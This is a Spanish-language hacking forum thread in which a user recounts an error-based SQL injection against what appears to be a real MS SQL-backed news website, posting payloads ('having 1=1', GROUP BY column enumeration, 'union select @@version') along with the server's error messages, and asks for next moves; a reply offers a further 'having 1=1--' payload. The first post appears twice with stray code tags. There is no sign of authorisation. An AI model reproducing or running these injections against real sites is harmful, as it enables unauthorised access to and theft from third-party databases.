Autor
Heme aqui de nuevo ( ¿que desgracia eh 
?)
Bueno, vamos a ver:
Consegui sacar el nombre de una columna de una web(trabala con MS SQL), y bueno, probe algo mas, pero me quede encallado. Primero hice:
id=456+having+1=1
Y me produjo el siguiente error:
Asi que fui rellenando con group by, hasta que al tratar de meter la sentencia:
Me produjo el siguiente error:
Y ahi me quede, intente sacar la version con
Y me dijo:
Y nada mas, me quede ahi estancado, a ver si alguien puede echarme una mano, solo orientarme un poco(no me gusta que me hagan las cosas), para donde puedo ir o cuales pueden ser mis movimientos siguientes.
Gracias de antemano, y un saludo
[/code]
?)Bueno, vamos a ver:
Consegui sacar el nombre de una columna de una web(trabala con MS SQL), y bueno, probe algo mas, pero me quede encallado. Primero hice:
id=456+having+1=1
Y me produjo el siguiente error:
Código:
[La columna 'noticias.ANTETITULO' de la lista de selección no es válida, porque no está contenida en una función de agregado y no hay cláusula GROUP BY./code]
Asi que luego hice:
id=456+group+by+noticias.ANTETITULO+having+1=1
Y me salio:
[code]Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]La columna 'noticias.TITULO' de la lista de selección no es válida, porque no está contenida en una función de agregado ni en la cláusula GROUP BY.
/web/sp/index.asp, line 11
Asi que fui rellenando con group by, hasta que al tratar de meter la sentencia:
Código:
id=456+group+by+noticias.ANTETITULO+,noticias.TITULO+,noticias.ENTRADILLA+,noticias.FECHA+,noticias.HEAD,+noticias.TEXTO+having+1=1--
Me produjo el siguiente error:
Código:
[Microsoft][ODBC SQL Server Driver][SQL Server]No se puede comparar ni ordenar los tipos de datos text, ntext e image, excepto cuando se utiliza el operador IS NULL o LIKE.
Y ahi me quede, intente sacar la version con
Código:
id=456+union+select+@@version,1,1,1,1
Y me dijo:
Código:
[Microsoft][ODBC SQL Server Driver][SQL Server]Error de sintaxis al convertir el valor varchar 'Cinco organizaciones ecologistas denuncian la especulación urbanística como la principal amenaza del medio ambiente en España' para una columna de tipo de datos int.
Y nada mas, me quede ahi estancado, a ver si alguien puede echarme una mano, solo orientarme un poco(no me gusta que me hagan las cosas), para donde puedo ir o cuales pueden ser mis movimientos siguientes.
Gracias de antemano, y un saludo
[/code]
es asi la onda:
Código:
id=1' having 1=1--
ayi tira el error... y la mayor veces te muestra los campos y el nombre de la tabla
En línea
